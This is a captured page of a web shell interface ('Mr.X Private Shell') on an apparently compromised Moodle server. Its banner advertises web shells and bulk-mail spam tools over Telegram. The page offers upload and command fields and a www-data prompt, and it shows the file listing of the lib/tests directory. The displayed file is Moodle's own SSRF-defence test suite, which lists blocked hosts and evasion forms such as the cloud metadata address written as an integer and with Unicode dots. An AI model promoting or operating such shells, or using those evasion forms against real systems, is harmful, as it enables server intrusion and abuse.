__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

www-data@216.73.216.148: ~ $ 
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace core;

/**
 * cURL security test suite.
 *
 * Note: The curl_security_helper class performs forward and reverse DNS look-ups in some cases. This class will not attempt to test
 * this functionality as look-ups can vary from machine to machine. Instead, human testing with known inputs/outputs is recommended.
 *
 * @package    core
 * @copyright  2016 Jake Dallimore <jrhdallimore@gmail.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
final class curl_security_helper_test extends \advanced_testcase {
    /**
     * Test for \core\files\curl_security_helper::url_is_blocked().
     *
     * @param array $dns a mapping between hosts and IPs to be used instead of a real DNS lookup. The values must be arrays.
     * @param string $url the url to validate.
     * @param string $blockedhosts the list of blocked hosts.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_url_data_provider
     */
    public function test_curl_security_helper_url_is_blocked($dns, $url, $blockedhosts, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = $this->getMockBuilder('\core\files\curl_security_helper')
            ->onlyMethods(['get_host_list_by_name'])
            ->getMock();

        // Override the get host list method to return hard coded values based on a mapping provided by $dns.
        $helper->method('get_host_list_by_name')->will(
            $this->returnCallback(
                function($host) use ($dns) {
                    return isset($dns[$host]) ? $dns[$host] : [];
                }
            )
        );

        set_config('curlsecurityblockedhosts', $blockedhosts);
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, $helper->url_is_blocked($url));
    }

    /**
     * Data provider for test_curl_security_helper_url_is_blocked().
     *
     * @return array
     */
    public static function curl_security_url_data_provider(): array {
        $simpledns = ['localhost' => ['127.0.0.1']];
        $multiplerecorddns = [
            'sub.example.com' => ['1.2.3.4', '5.6.7.8']
        ];
        // Format: url, blocked hosts, allowed ports, expected result.
        return [
            // Base set without the blocklist enabled - no checking takes place.
            [$simpledns, "http://localhost/x.png", "", "", false],       // IP=127.0.0.1, Port=80 (port inferred from http).
            [$simpledns, "http://localhost:80/x.png", "", "", false],    // IP=127.0.0.1, Port=80 (specific port overrides http scheme).
            [$simpledns, "https://localhost/x.png", "", "", false],      // IP=127.0.0.1, Port=443 (port inferred from https).
            [$simpledns, "http://localhost:443/x.png", "", "", false],   // IP=127.0.0.1, Port=443 (specific port overrides http scheme).
            [$simpledns, "localhost/x.png", "", "", false],              // IP=127.0.0.1, Port=80 (port inferred from http fallback).
            [$simpledns, "localhost:443/x.png", "", "", false],          // IP=127.0.0.1, Port=443 (port hard specified, despite http fallback).
            [$simpledns, "http://127.0.0.1/x.png", "", "", false],       // IP=127.0.0.1, Port=80 (port inferred from http).
            [$simpledns, "127.0.0.1/x.png", "", "", false],              // IP=127.0.0.1, Port=80 (port inferred from http fallback).
            [$simpledns, "http://localhost:8080/x.png", "", "", false],  // IP=127.0.0.1, Port=8080 (port hard specified).
            [$simpledns, "http://192.168.1.10/x.png", "", "", false],    // IP=192.168.1.10, Port=80 (port inferred from http).
            [$simpledns, "https://192.168.1.10/x.png", "", "", false],   // IP=192.168.1.10, Port=443 (port inferred from https).
            [$simpledns, "http://sub.example.com/x.png", "", "", false], // IP=::1, Port = 80 (port inferred from http).
            [$simpledns, "http://s-1.d-1.com/x.png", "", "", false],     // IP=::1, Port = 80 (port inferred from http).

            // Test set using domain name filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "localhost", "", true],
            [$simpledns, "localhost/x.png", "localhost", "", true],
            [$simpledns, "localhost:0/x.png", "localhost", "", true],
            [$simpledns, "ftp://localhost/x.png", "localhost", "", true],
            [$simpledns, "http://sub.example.com/x.png", "localhost", "", false],
            [$simpledns, "http://example.com/x.png", "example.com", "", true],
            [$simpledns, "http://sub.example.com/x.png", "example.com", "", false],

            // Test set using wildcard domain name filters but with all ports allowed (empty).
            [$simpledns, "http://sub.example.com/x.png", "*.com", "", true],
            [$simpledns, "http://example.com/x.png", "*.example.com", "", false],
            [$simpledns, "http://sub.example.com/x.png", "*.example.com", "", true],
            [$simpledns, "http://sub.example.com/x.png", "*.sub.example.com", "", false],
            [$simpledns, "http://sub.example.com/x.png", "*.example", "", false],

            // Test set using IP address filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.1", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.1", "", true],

            // Test set using CIDR IP range filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.0/24", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.0/24", "", true],

            // Test set using last-group range filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.0-30", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.0-30", "", true],

            // Test set using port filters but with all hosts allowed (empty).
            [$simpledns, "http://localhost/x.png", "", "80\n443", false],
            [$simpledns, "http://localhost:80/x.png", "", "80\n443", false],
            [$simpledns, "https://localhost/x.png", "", "80\n443", false],
            [$simpledns, "http://localhost:443/x.png", "", "80\n443", false],
            [$simpledns, "http://sub.example.com:8080/x.png", "", "80\n443", true],
            [$simpledns, "http://sub.example.com:-80/x.png", "", "80\n443", true],
            [$simpledns, "http://sub.example.com:aaa/x.png", "", "80\n443", true],

            // Test set using port filters and hosts filters.
            [$simpledns, "http://localhost/x.png", "127.0.0.1", "80\n443", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.1", "80\n443", true],

            // Test using multiple A records.
            // Multiple record DNS gives two IPs for the same host, we want to make
            // sure that if we block one of those (doesn't matter which one)
            // the request is blocked.
            [$multiplerecorddns, "http://sub.example.com", '1.2.3.4', "", true],
            [$multiplerecorddns, "http://sub.example.com", '5.6.7.8', "", true],

            // Test when DNS resolution fails.
            [[], "http://example.com", "127.0.0.1", "", true],

            // Test ensures that the default value of getremoteaddr() 0.0.0.0 will check against the provided blocked list.
            [$simpledns, "http://0.0.0.0/x.png", "0.0.0.0", "", true],
            // Test set using IPV4 with integer format.
            [$simpledns, "http://2852039166/x.png", "169.254.169.254", "", true],

            // Test some freaky deaky Unicode domains. Should be blocked always.
            [$simpledns, "http://169。254。169。254/", "127.0.0.1", "", true],
            [$simpledns, "http://169。254。169。254/", "1.2.3.4", "", true],
            [$simpledns, "http://169。254。169。254/", "127.0.0.1", "80\n443", true]

            // Note on testing URLs using IPv6 notation:
            // At present, the curl_security_helper class doesn't support IPv6 url notation.
            // E.g.  http://[ad34::dddd]:port/resource
            // This is because it uses clean_param(x, PARAM_URL) as part of parsing, which won't validate urls having IPv6 notation.
            // The underlying IPv6 address and range support is in place, however, so if clean_param is changed in future,
            // please add the following test sets.
            // 1. ["http://[::1]/x.png", "", "", false]
            // 2. ["http://[::1]/x.png", "::1", "", true]
            // 3. ["http://[::1]/x.png", "::1/64", "", true]
            // 4. ["http://[fe80::dddd]/x.png", "fe80::cccc-eeee", "", true]
            // 5. ["http://[fe80::dddd]/x.png", "fe80::dddd/128", "", true].
        ];
    }

    /**
     * Test for \core\files\curl_security_helper->is_enabled().
     *
     * @param string $blockedhosts the list of blocked hosts.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_settings_data_provider
     */
    public function test_curl_security_helper_is_enabled($blockedhosts, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityblockedhosts', $blockedhosts);
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, $helper->is_enabled());
    }

    /**
     * Data provider for test_curl_security_helper_is_enabled().
     *
     * @return array
     */
    public static function curl_security_settings_data_provider(): array {
        // Format: blocked hosts, allowed ports, expected result.
        return [
            ["", "", false],
            ["127.0.0.1", "", true],
            ["localhost", "", true],
            ["127.0.0.0/24\n192.0.0.0/24", "", true],
            ["", "80\n443", true],
        ];
    }

    /**
     * Test for \core\files\curl_security_helper::host_is_blocked().
     *
     * @param string $host the host to validate.
     * @param string $blockedhosts the list of blocked hosts.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_host_data_provider
     */
    public function test_curl_security_helper_host_is_blocked($host, $blockedhosts, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityblockedhosts', $blockedhosts);
        $this->assertEquals($expected, \phpunit_util::call_internal_method($helper, 'host_is_blocked', [$host],
                                                                          '\core\files\curl_security_helper'));
    }

    /**
     * Data provider for test_curl_security_helper_host_is_blocked().
     *
     * @return array
     */
    public static function curl_security_host_data_provider(): array {
        return [
            // IPv4 hosts.
            ["127.0.0.1", "127.0.0.1", true],
            ["127.0.0.1", "127.0.0.0/24", true],
            ["127.0.0.1", "127.0.0.0-40", true],
            ["", "127.0.0.0/24", false],

            // IPv6 hosts.
            // Note: ["::", "::", true], - should match but 'address_in_subnet()' has trouble with fully collapsed IPv6 addresses.
            ["::1", "::1", true],
            ["::1", "::0-cccc", true],
            ["::1", "::0/64", true],
            ["FE80:0000:0000:0000:0000:0000:0000:0000", "fe80::/128", true],
            ["fe80::eeee", "fe80::ddde/64", true],
            ["fe80::dddd", "fe80::cccc-eeee", true],
            ["fe80::dddd", "fe80::ddde-eeee", false],

            // Domain name hosts.
            ["example.com", "example.com", true],
            ["sub.example.com", "example.com", false],
            ["example.com", "*.com", true],
            ["example.com", "*.example.com", false],
            ["sub.example.com", "*.example.com", true],
            ["sub.sub.example.com", "*.example.com", true],
            ["sub.example.com", "*example.com", false],
            ["sub.example.com", "*.example", false],

            // International domain name hosts.
            ["xn--nw2a.xn--j6w193g", "xn--nw2a.xn--j6w193g", true], // The domain 見.香港 is ace-encoded to xn--nw2a.xn--j6w193g.
        ];
    }

    /**
     * Test for \core\files\curl_security_helper->port_is_blocked().
     *
     * @param int|string $port the port to validate.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_port_data_provider
     */
    public function test_curl_security_helper_port_is_blocked($port, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, \phpunit_util::call_internal_method($helper, 'port_is_blocked', [$port],
                                                                          '\core\files\curl_security_helper'));
    }

    /**
     * Data provider for test_curl_security_helper_port_is_blocked().
     *
     * @return array
     */
    public static function curl_security_port_data_provider(): array {
        return [
            ["", "80\n443", true],
            [" ", "80\n443", true],
            ["-1", "80\n443", true],
            [-1, "80\n443", true],
            ["n", "80\n443", true],
            [0, "80\n443", true],
            ["0", "80\n443", true],
            [8080, "80\n443", true],
            ["8080", "80\n443", true],
            ["80", "80\n443", false],
            [80, "80\n443", false],
            [443, "80\n443", false],
            [0, "", true], // Port 0 and below are always invalid, even when the admin hasn't set allowed entries.
            [-1, "", true], // Port 0 and below are always invalid, even when the admin hasn't set allowed entries.
            [null, "", true], // Non-string, non-int values are invalid.
        ];
    }

    /**
     * Test for \core\files\curl_security_helper::get_blocked_url_string().
     */
    public function test_curl_security_helper_get_blocked_url_string(): void {
        $helper = new \core\files\curl_security_helper();
        $this->assertEquals(get_string('curlsecurityurlblocked', 'admin'), $helper->get_blocked_url_string());
    }
}

Filemanager

DIR : / var/ www/ html/ vcom/ lib/ tests/
Name Type Size Permission Actions
analytics Folder 0755
behat Folder 0755
classes Folder 0755
content Folder 0755
context Folder 0755
db Folder 0755
event Folder 0755
external Folder 0755
fixtures Folder 0755
hook Folder 0755
hub Folder 0755
lock Folder 0755
moodlenet Folder 0755
navigation Folder 0755
oauth2 Folder 0755
other Folder 0755
output Folder 0755
performance Folder 0755
plugininfo Folder 0755
privacy Folder 0755
route Folder 0755
router Folder 0755
session Folder 0755
task Folder 0755
accesslib_has_capability_test.php File 29.76 KB 0644
accesslib_test.php File 245.63 KB 0644
adminlib_test.php File 7.42 KB 0644
admintree_test.php File 18.08 KB 0644
ajaxlib_test.php File 4.45 KB 0644
analysers_test.php File 12.71 KB 0644
antivirus_test.php File 11.98 KB 0644
attribute_helper_test.php File 8.41 KB 0644
authlib_test.php File 22.97 KB 0644
behat_lib_test.php File 3.3 KB 0644
blocklib_test.php File 36.31 KB 0644
check_test.php File 2.31 KB 0644
client_test.php File 4.32 KB 0644
collator_test.php File 12.1 KB 0644
completionlib_test.php File 92.46 KB 0644
component_test.php File 49.28 KB 0644
componentlib_test.php File 6.93 KB 0644
configonlylib_test.php File 8.95 KB 0644
content_test.php File 4.79 KB 0644
context_block_test.php File 4.17 KB 0644
context_helper_test.php File 22.28 KB 0644
context_test.php File 3.42 KB 0644
core_media_player_native_test.php File 6.44 KB 0644
core_renderer_template_exploit_test.php File 16.54 KB 0644
core_renderer_test.php File 7.57 KB 0644
core_userfeedback_test.php File 2.3 KB 0644
coverage.php File 3.27 KB 0644
cron_test.php File 6.82 KB 0644
csvclass_test.php File 5.66 KB 0644
curl_security_helper_test.php File 14.88 KB 0644
customcontext_test.php File 4.67 KB 0644
dataformat_test.php File 4.18 KB 0644
datalib_test.php File 48.97 KB 0644
datalib_update_with_unique_index_test.php File 6.12 KB 0644
date_legacy_test.php File 13.67 KB 0644
date_test.php File 30.4 KB 0644
deprecation_test.php File 15.78 KB 0644
di_test.php File 5.33 KB 0644
editorlib_test.php File 1.96 KB 0644
emoticon_manager_test.php File 4.2 KB 0644
encryption_test.php File 9.48 KB 0644
environment_test.php File 9.12 KB 0644
exporter_test.php File 16.83 KB 0644
externallib_test.php File 2.03 KB 0644
filelib_test.php File 83.89 KB 0644
filestorage_zip_archive_test.php File 2.54 KB 0644
filetypes_test.php File 10.09 KB 0644
filter_manager_test.php File 3.33 KB 0644
filterlib_test.php File 37.09 KB 0644
formatting_test.php File 26.09 KB 0644
formslib_test.php File 40.1 KB 0644
gdlib_test.php File 5.73 KB 0644
googlelib_test.php File 1.62 KB 0644
gradelib_test.php File 12.01 KB 0644
grades_external_test.php File 11.22 KB 0644
grading_external_test.php File 26.55 KB 0644
graphlib_test.php File 7.14 KB 0644
grouplib_test.php File 110.79 KB 0644
h5p_clean_orphaned_records_task_test.php File 3.17 KB 0644
html2text_test.php File 8.82 KB 0644
htmlpurifier_test.php File 23.11 KB 0644
http_client_test.php File 14.67 KB 0644
ip_utils_test.php File 19.55 KB 0644
jquery_test.php File 1.59 KB 0644
ldaplib_test.php File 17.77 KB 0644
licenselib_test.php File 11.84 KB 0644
locale_test.php File 4.96 KB 0644
lock_config_test.php File 3.48 KB 0644
lock_test.php File 5.34 KB 0644
markdown_test.php File 2.27 KB 0644
mathslib_test.php File 13.51 KB 0644
medialib_test.php File 19.68 KB 0644
message_test.php File 16.43 KB 0644
messagelib_test.php File 56.44 KB 0644
minify_test.php File 3.15 KB 0644
modinfolib_test.php File 99.71 KB 0644
moodle_page_test.php File 34.62 KB 0644
moodlelib_current_language_test.php File 7.68 KB 0644
moodlelib_partial_test.php File 4.48 KB 0644
moodlelib_test.php File 239.56 KB 0644
myprofilelib_test.php File 12.2 KB 0644
navigationlib_test.php File 32.56 KB 0644
notification_test.php File 4.37 KB 0644
oauth2_test.php File 23.16 KB 0644
outputcomponents_test.php File 34.31 KB 0644
outputfactories_test.php File 6.83 KB 0644
outputrenderers_test.php File 1.63 KB 0644
outputrequirementslib_test.php File 15.72 KB 0644
param_test.php File 4.11 KB 0644
pdflib_test.php File 3.21 KB 0644
persistent_test.php File 30.68 KB 0644
phpxmlrpc_test.php File 2.05 KB 0644
plugin_manager_test.php File 31.47 KB 0644
portfoliolib_test.php File 8.41 KB 0644
progress_display_test.php File 3.76 KB 0644
progress_test.php File 14.53 KB 0644
qrcode_test.php File 1.69 KB 0644
questionlib_test.php File 108.63 KB 0644
regex_test.php File 1.56 KB 0644
report_helper_test.php File 7 KB 0644
requirejs_test.php File 2.23 KB 0644
router_test.php File 3.85 KB 0644
rsslib_test.php File 7.41 KB 0644
rtlcss_test.php File 57.07 KB 0644
sample_questions.ser File 141.76 KB 0644
sample_questions.xml File 102.62 KB 0644
sample_questions_with_old_image_tag.ser File 4.85 KB 0644
sample_questions_with_old_image_tag.xml File 4.08 KB 0644
sample_questions_wrong.xml File 102.57 KB 0644
scss_test.php File 4.31 KB 0644
session_redis_cluster_test.php File 4.17 KB 0644
sessionlib_test.php File 12.37 KB 0644
setuplib_test.php File 20.21 KB 0644
statslib_test.php File 26.82 KB 0644
stored_progress_bar_test.php File 7.17 KB 0644
string_manager_standard_test.php File 10.23 KB 0644
system_clock_test.php File 2.42 KB 0644
text_test.php File 26.68 KB 0644
theme_config_test.php File 7.25 KB 0644
update_api_test.php File 6.65 KB 0644
update_checker_test.php File 10.91 KB 0644
update_code_manager_test.php File 9.12 KB 0644
update_validator_test.php File 18.32 KB 0644
upgrade_util_test.php File 5.36 KB 0644
upgradelib_test.php File 75.43 KB 0644
url_test.php File 25.48 KB 0644
user_menu_test.php File 3.83 KB 0644
user_test.php File 42.3 KB 0644
useragent_test.php File 67.06 KB 0644
weblib_format_text_test.php File 14.21 KB 0644
weblib_test.php File 42.12 KB 0644
xhprof_test.php File 10.05 KB 0644
xmlize_test.php File 2.57 KB 0644
xsendfilelib_test.php File 5 KB 0644

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager